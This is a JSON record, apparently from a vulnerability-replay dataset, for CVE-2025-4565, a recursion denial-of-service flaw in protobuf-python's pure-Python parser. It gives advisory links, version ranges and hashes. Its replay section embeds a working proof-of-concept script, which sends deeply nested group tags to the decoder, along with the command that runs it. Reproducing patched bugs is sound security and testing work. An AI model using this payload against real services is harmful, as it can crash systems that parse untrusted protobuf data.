{
  "schema_version": "1",
  "cve_id": "CVE-2025-4565",
  "summary": "protobuf-python pure-Python backend can exceed Python recursion limits while parsing protobuf data with many recursive group tags, causing denial of service.",
  "project": "protobuf",
  "language": "python",
  "vuln_family": "deserialization",
  "references": [
    "https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-8qvm-5x2c-j2w7",
    "https://nvd.nist.gov/vuln/detail/CVE-2025-4565",
    "https://advisories.gitlab.com/pypi/protobuf/CVE-2025-4565/",
    "https://github.com/protocolbuffers/protobuf/commit/17838beda2943d08b8a9d4df5b68f5f04f26d901"
  ],
  "affected_versions": [
    "<4.25.8",
    ">=5.26.0,<5.29.5",
    ">=6.30.0,<6.31.1"
  ],
  "fixed_versions": [
    "4.25.8",
    "5.29.5",
    "6.31.1"
  ],
  "metadata": {
    "source_target": "https://files.pythonhosted.org/packages/source/p/protobuf/protobuf-5.29.4.tar.gz",
    "source_sha256": "4f1dfcd7997b31ef8f53ec82781ff434a28bf71d9102ddde14d076adcfc78c99",
    "fixture_script": "scripts/fetch_protobuf_5_29_4_fixture.sh",
    "validated_target_version": "5.29.4",
    "poc_sha256": "113671d29bbaf9d31944fdf1190dd8119439212cf2afe4f47f69a9e4770e67e6"
  },
  "replay": {
    "title": "CVE-2025-4565 protobuf-python pure-Python recursive group DoS",
    "vuln_family": "deserialization",
    "repro_command": "PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=python PYTHONPATH=@build_root@ python3 @payload_path@",
    "artifacts": [
      {
        "name": "cve-2025-4565-replay.py",
        "encoding": "text",
        "content": "from google.protobuf.internal import decoder, wire_format\n\npayload = memoryview(b'\\x13' * 5000)\ntry:\n    decoder._DecodeUnknownField(payload, 1, wire_format.WIRETYPE_START_GROUP)\nexcept RecursionError:\n    raise\nexcept Exception as exc:\n    if 'too many levels of nesting' in str(exc):\n        raise SystemExit(0)\n    raise\n"
      }
    ],
    "severity": "high",
    "candidate_file": "google/protobuf/internal/decoder.py",
    "candidate_line": 968,
    "function_or_sink": "_DecodeUnknownField",
    "notes": "Public advisory describes recursive SGROUP/tag parsing in the pure-Python backend. The replay forces the pure-Python implementation, expects a RecursionError traceback on protobuf 5.29.4, and treats the fixed recursion-depth DecodeError as non-confirming."
  }
}
